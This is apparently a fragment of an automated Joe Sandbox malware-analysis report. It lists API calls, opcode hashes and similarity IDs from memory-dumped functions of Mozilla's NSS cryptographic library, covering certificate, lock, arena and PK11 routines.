                                                            • Instruction ID: 6aac908cb65cb94dfb130629d299f25129d00091b3271f35e2ccb346a9a3aa4b
                                                            • Opcode Fuzzy Hash: 5d9c282da0f5bfa299015fe1a794069f9ce7b7e9775a250346624a38b5e03d79
                                                            • Instruction Fuzzy Hash: 495105B6E002105FEB009F64DD81EBB37B8AF1521CF594024ED0597B02FB35ED9D96A2
                                                            APIs
                                                              • Part of subcall function 6CA18850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CA20715), ref: 6CA18859
                                                              • Part of subcall function 6CA18850: PR_NewLock.NSS3 ref: 6CA18874
                                                              • Part of subcall function 6CA18850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CA1888D
                                                            • PR_NewLock.NSS3 ref: 6CA19CAD
                                                              • Part of subcall function 6CAC98D0: calloc.MOZGLUE(00000001,00000084,6C9F0936,00000001,?,6C9F102C), ref: 6CAC98E5
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07AD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07CD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07D6
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C98204A), ref: 6C9F07E4
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,6C98204A), ref: 6C9F0864
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C9F0880
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C98204A), ref: 6C9F08CB
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08D7
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08FB
                                                            • TlsGetValue.KERNEL32 ref: 6CA19CE8
                                                            • EnterCriticalSection.KERNEL32(?,?,6CA1ECEC,6CA22FCD,00000000,?,6CA22FCD,?), ref: 6CA19D01
                                                            • TlsGetValue.KERNEL32(?,?,?,6CA1ECEC,6CA22FCD,00000000,?,6CA22FCD,?), ref: 6CA19D38
                                                            • EnterCriticalSection.KERNEL32(?,?,6CA1ECEC,6CA22FCD,00000000,?,6CA22FCD,?), ref: 6CA19D4D
                                                            • PR_Unlock.NSS3 ref: 6CA19D70
                                                            • PR_Unlock.NSS3 ref: 6CA19DC3
                                                            • PR_NewLock.NSS3 ref: 6CA19DDD
                                                              • Part of subcall function 6CA188D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA20725,00000000,00000058), ref: 6CA18906
                                                              • Part of subcall function 6CA188D0: EnterCriticalSection.KERNEL32(?), ref: 6CA1891A
                                                              • Part of subcall function 6CA188D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CA1894A
                                                              • Part of subcall function 6CA188D0: calloc.MOZGLUE(00000001,6CA2072D,00000000,00000000,00000000,?,6CA20725,00000000,00000058), ref: 6CA18959
                                                              • Part of subcall function 6CA188D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CA18993
                                                              • Part of subcall function 6CA188D0: PR_Unlock.NSS3(?), ref: 6CA189AF
                                                            Similarity
                                                            • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                            • String ID:
                                                            • API String ID: 3394263606-0
                                                            • Opcode ID: 6f5786c61c2ae35af64a951b50a18f1f9047eba2bfe67f742e83fff4be3867dd
                                                            • Instruction ID: 0eeaf1e496dc9c73bc07f151e6e499273293ef99b40aae88a7c72670405ea6bc
                                                            • Opcode Fuzzy Hash: 6f5786c61c2ae35af64a951b50a18f1f9047eba2bfe67f742e83fff4be3867dd
                                                            • Instruction Fuzzy Hash: B0516371A197058FDB00EF78C2846AABBF5BF44358F198569D8989BF10E730E8C4CB91
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB19EC0
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB19EF9
                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CB19F73
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB19FA5
                                                            • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CB19FCF
                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CB19FF2
                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CB1A01D
                                                            Similarity
                                                            • API ID: CriticalEnterSection
                                                            • String ID:
                                                            • API String ID: 1904992153-0
                                                            • Opcode ID: 20e2b36aff5188512e53642c05bba5a99b78c0ae24bedbdb0590e7bcceea2224
                                                            • Instruction ID: e85faee090398608458e51aa1aee45992c8b7f432bf877762a7e6133ec25f5e2
                                                            • Opcode Fuzzy Hash: 20e2b36aff5188512e53642c05bba5a99b78c0ae24bedbdb0590e7bcceea2224
                                                            • Instruction Fuzzy Hash: 6E518BB2D04640DBCB109F25D98468AB7F4FF08319F25866AD8595BF12E731F889CF92
                                                            APIs
                                                            • PR_Now.NSS3 ref: 6CA0DCFA
                                                              • Part of subcall function 6CAC9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DC6
                                                              • Part of subcall function 6CAC9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DD1
                                                              • Part of subcall function 6CAC9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAC9DED
                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA0DD40
                                                            • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CA0DD62
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA0DD71
                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6CA0DD81
                                                            • CERT_RemoveCertListNode.NSS3(?), ref: 6CA0DD8F
                                                              • Part of subcall function 6CA206A0: TlsGetValue.KERNEL32 ref: 6CA206C2
                                                              • Part of subcall function 6CA206A0: EnterCriticalSection.KERNEL32(?), ref: 6CA206D6
                                                              • Part of subcall function 6CA206A0: PR_Unlock.NSS3 ref: 6CA206EB
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA0DD9E
                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6CA0DDB7
                                                            Similarity
                                                            • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                            • String ID:
                                                            • API String ID: 653623313-0
                                                            • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                            • Instruction ID: c4d878c1efdcf3ff19c9bcd12627501a139c472117c539b8881b52d7dcf80d03
                                                            • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                            • Instruction Fuzzy Hash: 802180B6F021169BDB019EA5ED409DFB7B4AF0539CB180024E814A7701F721E999CBE2
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,?,?,?,6CA7460B,?,?), ref: 6CA03CA9
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA03CB9
                                                            • PL_HashTableLookup.NSS3(?), ref: 6CA03CC9
                                                            • SECITEM_DupItem_Util.NSS3(00000000), ref: 6CA03CD6
                                                            • PR_Unlock.NSS3 ref: 6CA03CE6
                                                            • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6CA03CF6
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA03D03
                                                            • PR_Unlock.NSS3 ref: 6CA03D15
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            Similarity
                                                            • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                            • String ID:
                                                            • API String ID: 1376842649-0
                                                            • Opcode ID: 9e717f0d5bf8c87d07c54e026391316d127e36674584d7fc7086bef4f4d1ede4
                                                            • Instruction ID: 6b7a4935cd3f93ad94e2644e682540701470194e0e5aebe74b43ad0c44358f51
                                                            • Opcode Fuzzy Hash: 9e717f0d5bf8c87d07c54e026391316d127e36674584d7fc7086bef4f4d1ede4
                                                            • Instruction Fuzzy Hash: FA11067AF01105BBEB011B25EC05CAA3A3DEB1229CB584530ED5C83611F722D8ACC6D2
                                                            APIs
                                                              • Part of subcall function 6CA211C0: PR_NewLock.NSS3 ref: 6CA21216
                                                            • free.MOZGLUE(?), ref: 6CA09E17
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA09E25
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA09E4E
                                                            • TlsGetValue.KERNEL32 ref: 6CA09EA2
                                                              • Part of subcall function 6CA19500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6CA19546
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA09EB6
                                                            • PR_Unlock.NSS3 ref: 6CA09ED9
                                                            • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CA09F18
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                            • String ID:
                                                            • API String ID: 3381623595-0
                                                            • Opcode ID: 52c86c31aad83d4c23595eadbf0319623a5973ad01648504b798f780472192af
                                                            • Instruction ID: ef1c185bd78538cde754345007c6922bd15211a83411f19d7c4684903c99cab8
                                                            • Opcode Fuzzy Hash: 52c86c31aad83d4c23595eadbf0319623a5973ad01648504b798f780472192af
                                                            • Instruction Fuzzy Hash: 9D81C5B5B04701ABE7009F34EE41AAB77A9BF4538CF184528E85987F41FB31E998C791
                                                            APIs
                                                              • Part of subcall function 6CA1AB10: DeleteCriticalSection.KERNEL32(D958E852,6CA21397,5B5F5EC0,?,?,6CA1B1EE,2404110F,?,?), ref: 6CA1AB3C
                                                              • Part of subcall function 6CA1AB10: free.MOZGLUE(D958E836,?,6CA1B1EE,2404110F,?,?), ref: 6CA1AB49
                                                              • Part of subcall function 6CA1AB10: DeleteCriticalSection.KERNEL32(5D5E6CC1), ref: 6CA1AB5C
                                                              • Part of subcall function 6CA1AB10: free.MOZGLUE(5D5E6CB5), ref: 6CA1AB63
                                                              • Part of subcall function 6CA1AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6CA1AB6F
                                                              • Part of subcall function 6CA1AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6CA1AB76
                                                            • TlsGetValue.KERNEL32 ref: 6CA1DCFA
                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6CA1DD0E
                                                            • PK11_IsFriendly.NSS3(?), ref: 6CA1DD73
                                                            • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6CA1DD8B
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA1DE81
                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA1DEA6
                                                            • PR_Unlock.NSS3(?), ref: 6CA1DF08
                                                            Similarity
                                                            • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                            • String ID:
                                                            • API String ID: 519503562-0
                                                            • Opcode ID: 962a73326c0e16926dea95e0f75a52ac4ac053f56581102dcb3a956a23aaa876
                                                            • Instruction ID: df547fb2dea4371e187f6bb3a1b1a5697b12f4b2768363f82e88b7ee5ab3021f
                                                            • Opcode Fuzzy Hash: 962a73326c0e16926dea95e0f75a52ac4ac053f56581102dcb3a956a23aaa876
                                                            • Instruction Fuzzy Hash: 9E91E4B5E051019FEB01CF68D980BAAB7B6FF54309F194028DC199BF41E731E999CB91
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __allrem
                                                            • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                            • API String ID: 2933888876-3221253098
                                                            • Opcode ID: 50dd19434b967d43837ce5f1ac4a4fed73c997c4877d066c06606a93ca6b1177
                                                            • Instruction ID: ca53917dfc958078818b99863f62b521f3b1bb8e2e5482243e17b7f44d0a8f0e
                                                            • Opcode Fuzzy Hash: 50dd19434b967d43837ce5f1ac4a4fed73c997c4877d066c06606a93ca6b1177
                                                            • Instruction Fuzzy Hash: E861AE75B006449FDB04CF68DC94BAA77B5FF4A314F208628E9299B790DB35EC06CB91
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CA2DF37
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA2DF4B
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA2DF96
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA2E02B
                                                            • PR_Unlock.NSS3(?), ref: 6CA2E07E
                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CA2E090
                                                            • PR_Unlock.NSS3(?), ref: 6CA2E0AF
                                                            Similarity
                                                            • API ID: Error$Unlock$CriticalEnterSectionValue
                                                            • String ID:
                                                            • API String ID: 4073542275-0
                                                            • Opcode ID: d9eda54b40100d1ee91decaf128c5f78c8441afa4cc96be368d8da66e82f2bbe
                                                            • Instruction ID: f44c29ef0ec807857e5ea0599128a2a49e9a79c9514008484db83d65a43ab37f
                                                            • Opcode Fuzzy Hash: d9eda54b40100d1ee91decaf128c5f78c8441afa4cc96be368d8da66e82f2bbe
                                                            • Instruction Fuzzy Hash: 3A51D131A446108FEB209F25C844B66B3B5FF44319F284928E89A47F91D739E8C9CBD2
                                                            APIs
                                                            • CERT_NewCertList.NSS3 ref: 6CA2BD1E
                                                              • Part of subcall function 6CA02F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA02F0A
                                                              • Part of subcall function 6CA02F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA02F1D
                                                              • Part of subcall function 6CA457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA0B41E,00000000,00000000,?,00000000,?,6CA0B41E,00000000,00000000,00000001,?), ref: 6CA457E0
                                                              • Part of subcall function 6CA457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CA45843
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA2BD8C
                                                              • Part of subcall function 6CA5FAB0: free.MOZGLUE(?,-00000001,?,?,6C9FF673,00000000,00000000), ref: 6CA5FAC7
                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6CA2BD9B
                                                            • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CA2BDA9
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA2BE3A
                                                              • Part of subcall function 6CA03E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA03EC2
                                                              • Part of subcall function 6CA03E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA03ED6
                                                              • Part of subcall function 6CA03E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA03EEE
                                                              • Part of subcall function 6CA03E60: PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA03F02
                                                              • Part of subcall function 6CA03E60: PL_FreeArenaPool.NSS3 ref: 6CA03F14
                                                              • Part of subcall function 6CA03E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA03F27
                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA2BE52
                                                              • Part of subcall function 6CA02E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA02CDA,?,00000000), ref: 6CA02E1E
                                                              • Part of subcall function 6CA02E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA02E33
                                                              • Part of subcall function 6CA02E00: TlsGetValue.KERNEL32 ref: 6CA02E4E
                                                              • Part of subcall function 6CA02E00: EnterCriticalSection.KERNEL32(?), ref: 6CA02E5E
                                                              • Part of subcall function 6CA02E00: PL_HashTableLookup.NSS3(?), ref: 6CA02E71
                                                              • Part of subcall function 6CA02E00: PL_HashTableRemove.NSS3(?), ref: 6CA02E84
                                                              • Part of subcall function 6CA02E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA02E96
                                                              • Part of subcall function 6CA02E00: PR_Unlock.NSS3 ref: 6CA02EA9
                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA2BE61
                                                            Similarity
                                                            • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                            • String ID:
                                                            • API String ID: 2178860483-0
                                                            • Opcode ID: 1a28426e1b970ec1cfbdfa6704f61cd752ebd1ce5910b8fbc9e2a86ab296eb84
                                                            • Instruction ID: 7f0e1ffa9aa0e3b1d6c5d81852542a9dfdfe7ef06e7b27bffcad41d56e14c54b
                                                            • Opcode Fuzzy Hash: 1a28426e1b970ec1cfbdfa6704f61cd752ebd1ce5910b8fbc9e2a86ab296eb84
                                                            • Instruction Fuzzy Hash: B241F6B5A002209FD710CF28ED80BAA77F4EF44758F588268F94997751E735EC98CB92
                                                            APIs
                                                            • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CA4AB3E,?,?,?), ref: 6CA4AC35
                                                              • Part of subcall function 6CA2CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CA2CF16
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CA4AB3E,?,?,?), ref: 6CA4AC55
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CA4AB3E,?,?), ref: 6CA4AC70
                                                              • Part of subcall function 6CA2E300: TlsGetValue.KERNEL32 ref: 6CA2E33C
                                                              • Part of subcall function 6CA2E300: EnterCriticalSection.KERNEL32(?), ref: 6CA2E350
                                                              • Part of subcall function 6CA2E300: PR_Unlock.NSS3(?), ref: 6CA2E5BC
                                                              • Part of subcall function 6CA2E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CA2E5CA
                                                              • Part of subcall function 6CA2E300: TlsGetValue.KERNEL32 ref: 6CA2E5F2
                                                              • Part of subcall function 6CA2E300: EnterCriticalSection.KERNEL32(?), ref: 6CA2E606
                                                              • Part of subcall function 6CA2E300: PORT_Alloc_Util.NSS3(?), ref: 6CA2E613
                                                            • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CA4AC92
                                                            • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA4AB3E), ref: 6CA4ACD7
                                                            • PORT_Alloc_Util.NSS3(?), ref: 6CA4AD10
                                                            • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CA4AD2B
                                                              • Part of subcall function 6CA2F360: TlsGetValue.KERNEL32(00000000,?,6CA4A904,?), ref: 6CA2F38B
                                                              • Part of subcall function 6CA2F360: EnterCriticalSection.KERNEL32(?,?,?,6CA4A904,?), ref: 6CA2F3A0
                                                              • Part of subcall function 6CA2F360: PR_Unlock.NSS3(?,?,?,?,6CA4A904,?), ref: 6CA2F3D3
                                                            Similarity
                                                            • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                            • String ID:
                                                            • API String ID: 2926855110-0
                                                            • Opcode ID: dc297c94c70319c875802cddcd5a47e77d736f8b363f315429ad3fa5b50c8241
                                                            • Instruction ID: 19802c209efa3185f3157286ed5bf9654f0d20a796f5847c04e4217533c5f6fe
                                                            • Opcode Fuzzy Hash: dc297c94c70319c875802cddcd5a47e77d736f8b363f315429ad3fa5b50c8241
                                                            • Instruction Fuzzy Hash: A03106B1E006159FEB008F699C409AF7667AF84728B1DC138E8159BB40EB31DD9987A1
                                                            APIs
                                                            • PR_Now.NSS3 ref: 6CA28C7C
                                                              • Part of subcall function 6CAC9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DC6
                                                              • Part of subcall function 6CAC9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB10A27), ref: 6CAC9DD1
                                                              • Part of subcall function 6CAC9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAC9DED
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA28CB0
                                                            • TlsGetValue.KERNEL32 ref: 6CA28CD1
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA28CE5
                                                            • PR_Unlock.NSS3(?), ref: 6CA28D2E
                                                            • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CA28D62
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA28D93
                                                            Similarity
                                                            • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                            • String ID:
                                                            • API String ID: 3131193014-0
                                                            • Opcode ID: daa7df4f0228baa8ce5bac7046f21bafd60fc1fa4027104a65e62d36a2468c45
                                                            • Instruction ID: c3db0b836a9f9346674ae8a32f313321739e9be8e4fe7fef8d02875407353f95
                                                            • Opcode Fuzzy Hash: daa7df4f0228baa8ce5bac7046f21bafd60fc1fa4027104a65e62d36a2468c45
                                                            • Instruction Fuzzy Hash: C4312872E01625AFE7009F68CD447AA7774BF15318F1C0136FA1967B90D778A9A8CBC1
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CA69C5B), ref: 6CA69D82
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CA69C5B), ref: 6CA69DA9
                                                              • Part of subcall function 6CA61340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?,00000000), ref: 6CA6136A
                                                              • Part of subcall function 6CA61340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?,00000000), ref: 6CA6137E
                                                              • Part of subcall function 6CA61340: PL_ArenaGrow.NSS3(?,6C9FF599,?,00000000,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?), ref: 6CA613CF
                                                              • Part of subcall function 6CA61340: PR_Unlock.NSS3(?,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?,00000000), ref: 6CA6145C
                                                            • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CA69C5B), ref: 6CA69DCE
                                                              • Part of subcall function 6CA61340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000,?,6C9FF599,?,00000000), ref: 6CA613F0
                                                              • Part of subcall function 6CA61340: PL_ArenaGrow.NSS3(?,6C9FF599,?,?,?,00000000,00000000,?,6CA0895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CA61445
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,6CA69C5B), ref: 6CA69DDC
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CA69C5B), ref: 6CA69DFE
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CA69C5B), ref: 6CA69E43
                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CA69C5B), ref: 6CA69E91
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                              • Part of subcall function 6CA61560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CA5FAAB,00000000), ref: 6CA6157E
                                                              • Part of subcall function 6CA61560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA5FAAB,00000000), ref: 6CA61592
                                                              • Part of subcall function 6CA61560: memset.VCRUNTIME140(?,00000000,?), ref: 6CA61600
                                                              • Part of subcall function 6CA61560: PL_ArenaRelease.NSS3(?,?), ref: 6CA61620
                                                              • Part of subcall function 6CA61560: PR_Unlock.NSS3(?), ref: 6CA61639
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                            • String ID:
                                                            • API String ID: 3425318038-0
                                                            APIs
                                                            • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CA2DDEC
                                                              • Part of subcall function 6CA60840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA608B4
                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6CA2DE70
                                                            • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CA2DE83
                                                            • HASH_ResultLenByOidTag.NSS3(?), ref: 6CA2DE95
                                                            • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CA2DEAE
                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA2DEBB
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA2DECC
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                            • String ID:
                                                            • API String ID: 1091488953-0
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CA5D9E4,00000000), ref: 6CA5DC30
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CA5D9E4,00000000), ref: 6CA5DC4E
                                                            • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CA5D9E4,00000000), ref: 6CA5DC5A
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CA5DC7E
                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA5DCAD
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
